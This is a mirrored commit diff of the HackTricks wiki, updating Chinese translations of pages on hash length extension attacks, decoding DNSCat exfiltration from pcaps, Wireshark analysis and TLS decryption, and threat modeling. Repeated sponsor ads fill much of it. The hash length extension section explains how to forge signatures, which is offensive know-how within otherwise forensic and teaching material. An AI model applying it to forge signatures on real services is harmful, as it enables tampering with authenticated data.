Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 01:17:36 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

Browse source
This commit is contained in:
Translator 2024-04-18 03:58:46 +00:00
parent ef29c68ab5
commit 0dd9d8461d
35 changed files with 911 additions and 815 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

36
README.md
View file

@ -5,7 +5,7 @@
_Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
{% hint style="success" %}
**欢迎来到这个维基,您将在这里找到我从CTF、真实应用、阅读研究和新闻中学到的每个黑客技巧/技术/等等。**
**欢迎来到这个维基您将找到我从CTF、真实应用程序、阅读研究和新闻中学到的每个黑客技巧/技术/等等。**
{% endhint %}
要开始,请查看此页面,您将找到**在渗透测试一个或多个机器时应遵循的典型流程**
@ -20,7 +20,7 @@ _Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/
<figure><img src=".gitbook/assets/stm (1).png" alt=""><figcaption></figcaption></figure>
[**STM Cyber**](https://www.stmcyber.com) 是一家出色的网络安全公司,其口号是**HACK THE UNHACKABLE**。他们进行自己的研究并开发自己的黑客工具,以提供像渗透测试、红队和培训等多有价值的网络安全服务。
[**STM Cyber**](https://www.stmcyber.com) 是一家出色的网络安全公司,其口号是**HACK THE UNHACKABLE**。他们进行自己的研究并开发自己的黑客工具,以提供像渗透测试、红队和培训等多有价值的网络安全服务。
您可以在[**https://blog.stmcyber.com**](https://blog.stmcyber.com)查看他们的**博客**。
@ -42,9 +42,9 @@ _Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/
<figure><img src=".gitbook/assets/image (44).png" alt=""><figcaption></figcaption></figure>
**Intigriti** 是欧洲排名第一的道德黑客和**漏洞赏平台**。
**Intigriti** 是欧洲排名第一的道德黑客和**漏洞赏平台**。
**漏洞赏提示****注册** Intigriti这是一家由黑客创建的高级**漏洞赏金平台**!立即加入我们的[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
**漏洞赏提示****注册** Intigriti这是一家由黑客创建的高级**漏洞悬赏平台**!立即加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的悬赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -55,7 +55,7 @@ _Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/
<figure><img src=".gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。
立即获取访问权限:
@ -67,11 +67,11 @@ _Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/
<figure><img src=".gitbook/assets/image (47).png" alt=""><figcaption></figcaption></figure>
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和漏洞赏猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏猎人交流!
* **黑客见解:**参与深入探讨黑客的刺激和挑战的内容
* **实时黑客新闻:**通过实时新闻和见解及时了解快节奏的黑客世界
* **最新公告:**通过最新的漏洞赏发布和重要平台更新保持信息更新
* **实时黑客新闻:**通过实时新闻和见解保持对快节奏的黑客世界的了解
* **最新公告:**通过最新的漏洞赏发布和重要平台更新保持信息更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),立即与顶尖黑客合作!
@ -91,13 +91,13 @@ _Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/
<figure><img src=".gitbook/assets/image (2) (1).png" alt=""><figcaption></figcaption></figure>
SerpApi 提供快速简便的实时 API用于**访问搜索引擎结果**。他们抓取搜索引擎、处理代理、解决验证码,并为您解析所有丰富的结构化数据。
SerpApi 提供快速简便的实时 API用于**访问搜索引擎结果**。他们抓取搜索引擎,处理代理,解决验证码,并为您解析所有丰富的结构化数据。
订阅 SerpApi 的计划之一,即可访问 50 多个不同的 API用于抓取不同搜索引擎的数据包括 Google、Bing、百度、雅虎、Yandex 等。\
订阅 SerpApi 的计划之一包括访问 50 多个不同的 API用于抓取不同搜索引擎的数据包括 Google、Bing、百度、雅虎、Yandex 等。\
与其他提供商不同,**SerpApi 不仅仅抓取有机结果**。SerpApi 的响应始终包括所有广告、内联图像和视频、知识图谱以及搜索结果中存在的其他元素和功能。
当前的 SerpApi 客户包括**苹果、Shopify 和 GrubHub**。\
欲了解更多信息,请查看他们的[**博客**](https://serpapi.com/blog/)****或在他们的[**游乐场**](https://serpapi.com/playground)**中尝试示例**。\
欲了解更多信息,请查看他们的[**博客**](https://serpapi.com/blog/)****或在他们的[**游乐场**](https://serpapi.com/playground)**中尝试一个示例**。\
您可以在[**此处**](https://serpapi.com/users/sign\_up)**创建免费帐户**。
***
@ -114,22 +114,22 @@ SerpApi 提供快速简便的实时 API用于**访问搜索引擎结果**。
<figure><img src=".gitbook/assets/websec (1).svg" alt=""><figcaption></figcaption></figure>
[**WebSec**](https://websec.nl) 是一家总部位于阿姆斯特丹的专业网络安全公司,通过提供**现代**方法的**攻击性安全服务**,帮助**全球各地的企业**抵御最新的网络安全威胁。
[**WebSec**](https://websec.nl) 是一家总部位于**阿姆斯特丹**的专业网络安全公司,通过提供**现代**方法的**攻击性安全服务**,帮助**全球各地的企业**抵御最新的网络安全威胁。
WebSec 是一家**全方位的安全公司**,意味着他们全面覆盖;渗透测试、**安全**审计、意识培训、钓鱼活动、代码审查、利用开发、安全专家外包等。
WebSec 的另一个很酷的地方与行业平均水平不同WebSec 对自己的技能非常有信心,以至于他们**保证提供最优质的结果**,在他们的网站上写着“**如果我们无法入侵,您就不用付费!**”。欲了解更多信息,请查看他们的[**网站**](https://websec.nl/en/)和[**博客**](https://websec.nl/blog/)
关于 WebSec 的另一个很酷的事情与行业平均水平不同WebSec 对自己的技能非常有信心,以至于他们**保证提供最优质的结果**,在他们的网站上写着“**如果我们无法入侵,您就不用付费!**”。欲了解更多信息,请查看他们的[**网站**](https://websec.nl/en/)和[**博客**](https://websec.nl/blog/)
除了上述内容WebSec 还是 HackTricks 的**忠实支持者**。
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -137,7 +137,7 @@ WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户劫
## 许可证和免责声明
查看:
查看他们的信息
{% content-ref url="welcome/hacktricks-values-and-faq.md" %}
[hacktricks-values-and-faq.md](welcome/hacktricks-values-and-faq.md)
@ -149,7 +149,7 @@ WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户劫
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们**。

22
crypto-and-stego/hash-length-extension-attack.md
View file

@ -12,11 +12,11 @@
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的侵害。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的侵害。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
@ -28,7 +28,7 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
# 攻击摘要
想象一个服务器正在通过**将一个** **秘密** **附加**到一些已知明文数据上然后对该数据进行哈希来**签名**数据。如果您知道:
想象一个服务器正在通过**将一个** **秘密** **附加**到一些已知明文数据上然后对该数据进行哈希来**签名**一些**数据**。如果您知道:
* **秘密的长度**(这也可以从给定长度范围内进行暴力破解)
* **明文数据**
@ -39,9 +39,9 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
那么,攻击者可以**附加数据**并为**先前数据+附加数据**生成有效的**签名**。
## 如何实现
## 如何?
基本上,易受攻击的算法通过首先**对数据块进行哈希**,然后,**从**先前创建的**哈希**(状态)开始,它们**添加下一个数据块**并**对其进行哈希**。
基本上,易受攻击的算法首先通过**对数据块进行哈希处理**,然后,**从**先前创建的**哈希**(状态)开始,它们**添加下一个数据块**并**对其进行哈希处理**。
然后,想象秘密是"secret",数据是"data""secretdata"的MD5是6036708eba0d11f6ef52ad44e8b74d5b。\
如果攻击者想要附加字符串"append",他可以:
@ -49,7 +49,7 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
* 生成64个"A"的MD5
* 将先前初始化的哈希状态更改为6036708eba0d11f6ef52ad44e8b74d5b
* 附加字符串"append"
* 完成哈希,生成的哈希将是**对"secret" + "data" + "填充" + "append"**有效的哈希
* 完成哈希处理,生成的哈希将是一个**对"secret" + "data" + "填充" + "append"**有效的哈希
## **工具**
@ -57,13 +57,13 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
## 参考资料
您可以在[https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)中找到对此攻击的很好解释
您可以在[https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)中找到对此攻击的很好解释
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的侵害。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的侵害。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。

29
generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md
View file

@ -1,21 +1,34 @@
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
### [WhiteIntel](https://whiteintel.io)
如果您有包含通过DNSCat**进行数据外泄的pcap文件**(未使用加密),您可以找到外泄的内容。
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
您只需要知道**前9个字节**不是真实数据,而是与**C\&C通信**相关的。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
---
如果您有通过DNSCat进行**数据外泄**的pcap文件未使用加密您可以找到外泄的内容。
您只需知道**前9个字节**不是真实数据,而是与**C\&C通信**相关的内容:
```python
from scapy.all import rdpcap, DNSQR, DNSRR
import struct
@ -34,11 +47,11 @@ last = qry
#print(f)
```
更多信息: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
更多信息[https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
[https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md)
有一个与Python3配合使用的脚本: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
有一个与Python3配合使用的脚本[https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
```
python3 dnscat_decoder.py sample.pcap bad_domain
```
@ -51,7 +64,7 @@ python3 dnscat_decoder.py sample.pcap bad_domain
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>

118
generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md
View file

@ -1,87 +1,99 @@
# Wireshark技巧
## Wireshark技巧
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
- 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)的GitHub仓库提交PR来分享您的黑客技巧。
</details>
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
---
## 提升您的Wireshark技能
### 教程
以下教程非常适合学习一些很酷的基本技巧:
* [https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/](https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/)
* [https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/](https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/)
* [https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/](https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/)
* [https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/](https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/)
- [https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/](https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/)
- [https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/](https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/)
- [https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/](https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/)
- [https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/](https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/)
### 分析信息
**专家信息**
_**Analyze** --> **Expert Information**_ 您将获得对**分析**的数据包的**概述**
_**Analyze** --> **Expert Information**_ 您将获得对**分析**的数据包中发生的情况的**概述**
![](<../../../.gitbook/assets/image (570).png>)
![](<../../../.gitbook/assets/image (253).png>)
**解析地址**
**解析地址**
_**Statistics --> Resolved Addresses**_您可以找到Wireshark解析的一些信息如端口/传输到协议MAC到制造商等。了解通信中涉及的内容是很有趣的。
_**Statistics --> Resolved Addresses**_您可以找到Wireshark解析的一些信息如端口/传输到协议MAC地址到制造商等。了解通信中涉及的内容是很有趣的。
![](<../../../.gitbook/assets/image (571).png>)
![](<../../../.gitbook/assets/image (890).png>)
**协议层次结构**
_**Statistics --> Protocol Hierarchy**_ 下,您可以找到通信中涉及的**协议**及其相关数据。
![](<../../../.gitbook/assets/image (572).png>)
![](<../../../.gitbook/assets/image (583).png>)
**对话**
_**Statistics --> Conversations**_ 下,您可以找到通信中对话的**摘要**及其相关数据。
![](<../../../.gitbook/assets/image (573).png>)
![](<../../../.gitbook/assets/image (450).png>)
**端点**
_**Statistics --> Endpoints**_ 下,您可以找到通信中端点的**摘要**及每个端点的相关数据。
![](<../../../.gitbook/assets/image (575).png>)
![](<../../../.gitbook/assets/image (893).png>)
**DNS信息**
_**Statistics --> DNS**_您可以找到有关捕获的DNS请求的统计信息。
![](<../../../.gitbook/assets/image (577).png>)
![](<../../../.gitbook/assets/image (1060).png>)
**I/O图**
_**Statistics --> I/O Graph**_ 下,您可以找到通信的**图表**。
![](<../../../.gitbook/assets/image (574).png>)
![](<../../../.gitbook/assets/image (989).png>)
### 过滤器
在这里您可以找到根据协议的Wireshark过滤器[https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
其他有趣的过滤器:
* `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
* HTTP和初始HTTPS流量
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)`
* HTTP和初始HTTPS流量 + TCP SYN
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)`
* HTTP和初始HTTPS流量 + TCP SYN + DNS请求
- `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
- HTTP和初始HTTPS流量
- `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)`
- HTTP和初始HTTPS流量 + TCP SYN
- `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)`
- HTTP和初始HTTPS流量 + TCP SYN + DNS请求
### 搜索
@ -89,13 +101,13 @@
### 免费的pcap实验室
**练习免费挑战:[https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)**
**通过以下免费挑战练习:** [**https://www.malware-traffic-analysis.net/**](https://www.malware-traffic-analysis.net)
## 识别域名
您可以添加一个显示Host HTTP头的列:
您可以添加一个显示Host HTTP头的列
![](<../../../.gitbook/assets/image (403).png>)
![](<../../../.gitbook/assets/image (635).png>)
以及添加一个从初始HTTPS连接中添加服务器名称的列**ssl.handshake.type == 1**
@ -107,21 +119,21 @@
在当前的Wireshark中您需要搜索`DHCP`而不是`bootp`
![](<../../../.gitbook/assets/image (404).png>)
![](<../../../.gitbook/assets/image (1010).png>)
### 从NBNS
![](<../../../.gitbook/assets/image (405).png>)
![](<../../../.gitbook/assets/image (1000).png>)
## 解密TLS
### 使用服务器私钥解密https流量
_edit>preference>protocol>ssl>_
_编辑>首选项>协议>ssl>_
![](<../../../.gitbook/assets/image (98).png>)
![](<../../../.gitbook/assets/image (1100).png>)
点击_Edit_然后添加服务器和私钥的所有数据_IP、端口、协议、密钥文件和密码_
点击_编辑_添加服务器和私钥的所有数据_IP、端口、协议、密钥文件和密码_
### 使用对称会话密钥解密https流量
@ -129,17 +141,16 @@ Firefox和Chrome都可以记录TLS会话密钥这些密钥可以与Wireshark
要检测此内容,请在环境中搜索变量`SSLKEYLOGFILE`
共享密钥文件如下所示
共享密钥文件看起来像这样
![](<../../../.gitbook/assets/image (99).png>)
![](<../../../.gitbook/assets/image (817).png>)
要将其导入Wireshark请转到_edit > preference > protocol > ssl > 并将其导入到Pre-Master-Secret日志文件名中
![](<../../../.gitbook/assets/image (100).png>)
要在Wireshark中导入此文件请转到\_编辑 > 首选项 > 协议 > ssl > 并将其导入到Pre-Master-Secret日志文件名中
![](<../../../.gitbook/assets/image (986).png>)
## ADB通信
发送APK的ADB通信中提取APK
从APK被发送的ADB通信中提取APK
```python
from scapy.all import *
@ -166,16 +177,29 @@ f = open('all_bytes.data', 'w+b')
f.write(all_bytes)
f.close()
```
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
其他支持HackTricks的方式
支持HackTricks的其他方式:
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索我们的独家[**NFTs**]收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>

30
generic-methodologies-and-resources/threat-modeling.md
View file

@ -1,10 +1,10 @@
# 威胁建模
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否已受到**窃取恶意软件**的**威胁**。
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否已受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
@ -21,13 +21,13 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
### 常用场景
1. **软件开发**作为安全软件开发生命周期SSDLC的一部分威胁建模有助于在开发的早期阶段**识别潜在的漏洞来源**。
2. **渗透测试**渗透测试执行标准PTES框架要求在进行测试之前进行**威胁建模以了解系统的漏洞**
2. **渗透测试**渗透测试执行标准PTES框架要求在进行测试之前进行威胁建模以了解系统的漏洞。
### 威胁模型简介
威胁模型通常以图表、图像或其他形式的视觉展示来表示,展示应用程序的计划架构或现有构建。它类似于**数据流图**,但其关键区别在于其面向安全的设计。
威胁模型通常包含用红色标记的元素,表示潜在的漏洞、风险或障碍。为了简化风险识别过程,通常采用CIA机密性、完整性、可用性三元组构成许多威胁建模方法的基础STRIDE是其中最常见的之一。然而选择的方法可能会根据具体的上下文和要求而有所不同。
威胁模型通常包含用红色标记的元素表示潜在的漏洞、风险或障碍。为了简化风险识别过程采用CIA机密性、完整性、可用性三元组构成许多威胁建模方法的基础STRIDE是其中最常见的之一。然而选择的方法可能会根据具体的上下文和要求而有所不同。
### CIA三元组
@ -41,18 +41,18 @@ CIA三元组是信息安全领域中广泛认可的模型代表机密性、
1. **STRIDE**由微软开发STRIDE是**欺骗、篡改、否认、信息披露、服务拒绝和权限提升**的首字母缩写。每个类别代表一种威胁类型,这种方法通常用于程序或系统设计阶段,以识别潜在威胁。
2. **DREAD**这是微软的另一种用于已识别威胁的风险评估方法。DREAD代表**破坏潜力、可重现性、可利用性、受影响用户和可发现性**。对这些因素进行评分,结果用于优先考虑已识别的威胁。
3. **PASTA**(攻击模拟和威胁分析过程):这是一个七步骤的**风险中心**方法。它包括定义和识别安全目标、创建技术范围、应用程序分解、威胁分析、漏洞分析和风险/分类评估。
4. **Trike**:这是一个以风险为基础的方法,侧重于保护资产。它从**风险管理**的角度出发,看威胁和漏洞。
3. **PASTA**(攻击模拟和威胁分析过程):这是一个七步骤的**风险中心**方法。它包括定义和识别安全目标、创建技术范围、应用程序分解、威胁分析、漏洞分析和风险/分类评估。
4. **Trike**:这是一个以风险管理为重点的方法,专注于保护资产。它从**风险管理**的角度出发,看威胁和漏洞。
